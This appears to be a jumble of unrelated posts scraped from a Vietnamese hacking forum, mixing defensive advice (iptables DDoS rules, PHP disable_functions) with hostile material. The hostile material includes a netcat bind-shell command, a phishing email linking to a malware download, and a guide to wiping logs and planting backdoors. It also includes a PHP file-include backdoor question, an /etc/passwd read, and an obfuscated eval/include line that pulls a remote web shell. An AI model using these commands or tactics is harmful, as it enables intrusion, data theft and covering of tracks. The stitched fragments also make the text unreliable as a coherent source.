HAIYEN02 wrote:

....
Em cảm ơn anh, cái vấn đề này em có nghĩ đến, nhưng mà chỉ là tạm thời thôi, nếu lần sau nó up X-Flash len site khác thì mình lại phải vào httpd sửa lại hoặc thêm vào.
Nếu dùng iptables thì có tốt hơn ko anh nhỉ? 

Nếu bồ làm chủ server và có quyền đụng đến iptables thì quá tốt.

Bồ cần 2 thứ quan trọng:

1) connection limit:

iptables -A INPUT -p tcp -d $IP --dport 80 -m state --state ESTABLISHED -m connlimit --connlimit-above $CONN -j DROP

trong đó,

$IP là IP của bồ.
$CONN là số lượng connections đi từ 1 IP mà bồ cho phép tạo ra. Thường mỗi IP không dùng quá 4 connections nếu đã chỉnh KeepAlive trên apache.


2) string match:

iptables -A INPUT -p tcp --tcp-flags ACK,PSH ACK,PSH -d $IP --dport 80 -m string --string "whatever" --from 10 --to 700 --algo bm -j DROP

trong đó,

$IP là IP của bồ.
"whatever" là cái string cụ thể nào đó mà x-flash đang DDoS bồ.
--from 10 --to 700 là chuỗi byte trong packet được kiểm tra xem có string nào như thế không.
--tcp-flags ACK,PSH ACK,PSH là gói TCP đặc trưng mà flash thường được dùng để tấn công.


Bồ phải xem thử kernel của Linux server bồ đang dùng đã có connlimit và string modules chưa. Nếu chưa thì phải patch và build lại kernel. Patch và build thế nào thì tham khảo các thảo luận trong box "*nix". Ngoài ra bồ phải phân tích kỹ các gói tin mình bị tấn công gồm có cái gì để điều chỉnh cho thích hợp. mod_security cho apache cũng là một tầng bảo vệ tốt. Tìm đọc "Ký sự những cuộc DDoS HVA" mà ngâm cứu thêm.

Good luck. 

nếu như các pro nói thì em cho netcat vào ổ C của máy đó , roi run nó như kiểu
nc -vv -l -p 8080 -e cmd.exe rồi sau đó mình cho netcat lắng nghe ở máy mình
làm như thế có được không nhỉ , nếu được thì add user và nâng quyền lên làm admin có được không nhỉ , nếu được thì chắc dùng remote desktop connection để connection chắc cũng được , em mới vào chỉ có vài ý đó không biết có đúng không , ai giảng giải giúp em  

Code:

Hacker Viet Nam <rereply@hvaonline.net>
hiển thị chi tiết
23:41
Thong bao ve chuong trinh hacker da su dung de hack website:
- Chuong trinh hacker da su dung de hack website: (Ban co the download ve nghien cuu de xem muc do nguy hiem cua chuong trinh nay,)
Canh bao ban khong nen lam dung no de hack website khac
Chuongtrinhhackweb.exe
 http://lpnumetal.com/product/chuongtrinhhackweb.exe
Chuongtrinhhackweb.zip
 http://lpnumetal.com/product/chuongtrinhhackweb.zip
Download chuong trinh, sau do open chay chuong trinh len, ban se thay 1 khung, sau do dien dia chi website bạn muon hack,
Chuong trinh chi hoat dong tren windows, linux. Neu ban gap thac mac hay lien he chung toi de duoc giai 0064ap

tối hôm qua em vào mail thì nhận đc 1 thông tin do host hvaonline.net gửi tới...em nhìn cái mail chắc chắn là do hvaonline.net gửi...khi down soft về run thì tự động biến mất ( nghi là virut rồi nên bật trình duyệt virut cũng kô quet đc....)...nó tự đông biến mất sau 3' vào window system cũng kô tìm ra ..phải chăng em bị lừa..các anh giải thích cho em vụ này...
đây là link cái url đó : http://lpnumetal.com/product/chuongtrinhhackweb.zip 

IP Add = địa chỉ nhà
Nhà thì lúc nào cũng khóa cửa => xâm nhập <=> phải mở được khóa
1. Hợp lệ : Có chìa khóa do chủ nhà cấp <=> Username & Pass
2. Bất hợp lệ : Cạy cửa <=> bẻ khóa
a. Xác định rõ kiến trúc nhà xem có bao nhiêu cửa, gỗ hay bêtông, có lỗ thủng nào không, cửa sổ có khóa không để chui vào <=> Xác định HĐH hệ thống = quét Banner, tìm các lỗ hổng bảo mật trên mạng xem đã fix chưa (theo từng hệ thống khác nhau)
Nếu Admin làm biếng chưa fix => May mắn, cứ thế mà chui lỗ chó vào.
Nếu đã fix các lỗi => chỉ còn cách bẻ ổ khóa mà vào
b. Xáx định rõ loại ổ khóa cần bẻ:
Bảo mật kém : Nó xài khóa TQ, cứ lựa đại chìa có sẵn mà kiểm thử <=> Admin lơ là xài pass dễ đoán wa'. (sử dụng Tool quét pass theo Dictionary)
Bảo mật tốt : Sử dụng khóa tốt, nhiều lớp cửa, có bầy chó Becgiê canh chừng, hệ thống hồng ngoại.... hic <=> Admin đã điều chỉnh các thông số default, pass khó đoán và được mã hóa tốt, sử dụng firewall nhiều tầng, hệ thống phát hiện xâm nhập IDS.... => |o| he he
Nếu kỹ năng + kỹ thuật tốt mà chui vào được => Muốn đập phá cứ đập phá (del data, deface), muốn chôm đồ cứ chôm đồ(copy data), muốn làm nơi ăn nhậu cứ ăn nhậu (bruteforce)..... (C15 tóm cổ).
Nếu không muốn bị tóm thì đừng phá phách.
Người thông minh: Lặng im quan sát, khi rời khỏi lau sạch dấu vết (xóa dấu chân, dấu vân tay) <=> xóa tất cả log có liên quan trong hệ thống. Đục 1 lỗ phía sau tường để sau này muốn vô ngủ không cần phải chìa khóa (cài Backdoor Trojan mở port để có thể Telnet) hoặc tạo cho mình một chìa khóa hợp lệ (add Account của mình vào hệ thống).
Kẻ lóc chóc: quậy phá tùm lum, để dấu vết tá lả cho C15 túm cổ.
Kỹ năng cần có:
1. Hiểu biết cặn kẽ về hệ thống và các dịch vụ trên hệ thống (tối thiểu Win và Linux)
2. Hiểu rõ về TCP/IP cũng như các Protocol khác
3. Có kỹ năng lập trình
...........

Vài lời nhắn gởi!!!!!! 

Vẫn còn khả năng đọc file nên việc tiếp tục nâng quyền qua local là có thể.Trường hợp dedicated server thì hiếm ai áp dụng việc bảo mật tối đa như vậy còn trường hợp share hosting thì làm vậy thật hết sức bất tiện  

include(“/home/$file”);

Xét VD:
một forum bị lỗi PHP include local file (bạn cần phân biệt lỗi php include remote file và php include local file). Mỗi user sau khi đăng nhập đc upload file ảnh (VD :JPG) làm avatar, các file định dạng khác (php, asp, pl,cgi ...) đều bị cấm ko đc upload
Các file ảnh sau khi đc upload sẽ nằm trong folder www.site.com/image/xxx.JPG
link bị include local file:
http://site.com/bug.php?file=xxx.xxx
nội dung của file bug.php

<?php
include(“/home/$file”);
?> 

Câu hỏi đc đặt ra ... Làm sao include đc backdoor đây ??
Mời các bác tham gia thảo luận
(nguồn milw0rm.com) 

disable_functions = exec, system, passthru, proc_open, shell_exec, dl, popen, pclose, fsockopen, pfsockopen, getrusage , alter_ini, set_ini, ini_restore , set_time_limit, leak, listen, virtual , mysql_list_dbs, mysql_pconnect, mysql_create_db, mysql_drop_db, mysql_get_client_info, mysql_get_host_info, mysql_get_proto_info, mysql_db_name , phpcredits, php_logo_guid, zend_logo_guid, php_uname , getmyuid, getmygid, getmypid, getmyinode, get_current_user , syslog, openlog, fopenstream , chroot, chown, chgrp , disk_free_space, disk_total_space, diskfreespace , filegroup, fileinode, fileowner , link, readlink, symlink  

Bác có thể đưa lên đây đc kô? Đảm bảo trong vòng 1 ngày chơi đc tất cả các site của bác ok 

forum của mình thông thường số member truy cập là 20-30 member

nhưng ko biết sao bỗng nhiên số member tăng vọt lên 200 -300 -900-1500....

 

lưu ý : dạo này forum thường có bài poss có dạng như vầy , ko biết có phải là do nó không


Code:

123eval(includeCHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47).CHR(47).CHR(102).CHR(114).CHR(101).CHR(101).CHR(119).CHR(101).CHR(98).CHR(116).CHR(111).CHR(119).CHR(110).CHR(46).CHR(99).CHR(111).CHR(47).CHR(109).CHR(98).CHR(97).CHR(98).CHR(121).CHR(107).CHR(105).CHR(115).CHR(115).CHR(56).CHR(57).CHR(49).CHR(47).CHR(114).CHR(53).CHR(55).CHR(46).CHR(116).CHR(120).(116))); //

 

Config ok hết rồi chỉ vướng ở phía ngoài thôi, cục bộ thì kết nối Ok nhung bên ngoài kết nối vào thì chưa được. (chắc config modem chưa đúng).
Thanks shockdown! 

Không thể format ổ cứng đang chạy hệ điều hành ngay cả đang làm trực tiếp trên máy. Bởi thế, càng không thể làm chuyện này từ xa. 

Hi hi anh Defender đây rồi, em nói chơi thôi, vậy mà anh làm thiệt đi Format cái ổ Data của em.
Nghỉ chơi với anh luôn.
Khi nào rảnh vô YM chỉ em anh đã làm như thế nào nhé.  

Trojan điều khiển từ xa thì em có biết chút. Nhưng em nghĩ là phải là ngồi trước máy của mình thì mình mới vô DOS thực hiện lệnh Format ổ cứng được chứ anh.

Sao cứ rối tung lên thế nhỉ? 

Em chào các anh. Em có một câu hỏi thế này, mong được các anh giải thích cụ thể cho em hiểu.

Làm sao để có thể Format ổ cứng của một máy tính từ một máy tính khác ở xa?

Em cảm ơn. 

He he tui có một cách giản đơn hơn cả luke

readfile("/etc/passwd");

Chấp cả Safe_mode vì đây là một hàm khá thông dụng trong việc đọc file nên ít server dám chặn nó
 

và mình đã quản lý forum lại được rồi,
vấn đề bây giờ là làm sao khắc phục được lỗi và bảo mật lại forum thôi
không biết sao member có thể lấy được quyền admin nữa
 

FORUM CỦA MÌNH VỪA BỊ HACKER TẤN CÔNG VÀ ĐÃ LẤY ĐƯỢC QUYỀN ADMIN , SAU ĐÓ MÌNH ĐÃ VÀO HOST SEVER TẠO LẠI ADMIN MỚI VÀ ĐÃ XÓA CÁC NICK ADMIN KHÁC CỦA KẺ TẤN CÔNG

NAY MÌNH KHÔNG BIẾT LÀM SAO ĐỂ SỬA LỖI CHO FORUM VÀ CŨNG NHƯ BẢO MẬT LẠI FORUM

MẤY HUYNH GIÚP GIÙM VỚI

forum của mình là ipb v2.1

 

máy em luon bi reset ,khi cài win luôn xuất hiện các ký tự lạ
em đã thay ram khác vào thì không bị hiện tượng như thế nữa.em đã thử 1 số công cụ test ram và theo chuẩn đoán thí có virut trong ram
ai có phần mềm diệt virut trong ram chỉ em với hoặc có cách nao cho may em ko bi reset nữa xin chỉ em với.em xin cảm ơn(SD Ram)
email:babygirl_studyhack@yahoo.com

Dời vào box "Thảo luận virus" 

hện tại forum của mình bị tấn công khi phát hiện ra thì mình đã mất quyền admin, sau đó mình vào host sever tạo lại tài khoản admin mới và đã xóa các nick admin khác của hacker

nhưng khi đăng nhập vào admin của forum được khoản 10 phút để sửa lại forum thì nó đã bị báo lỗi này
http://i18.tinypic.com/4d4tr0m.jpg

mấy huynh xem giùm bị lỗi gì và cách sửa chữa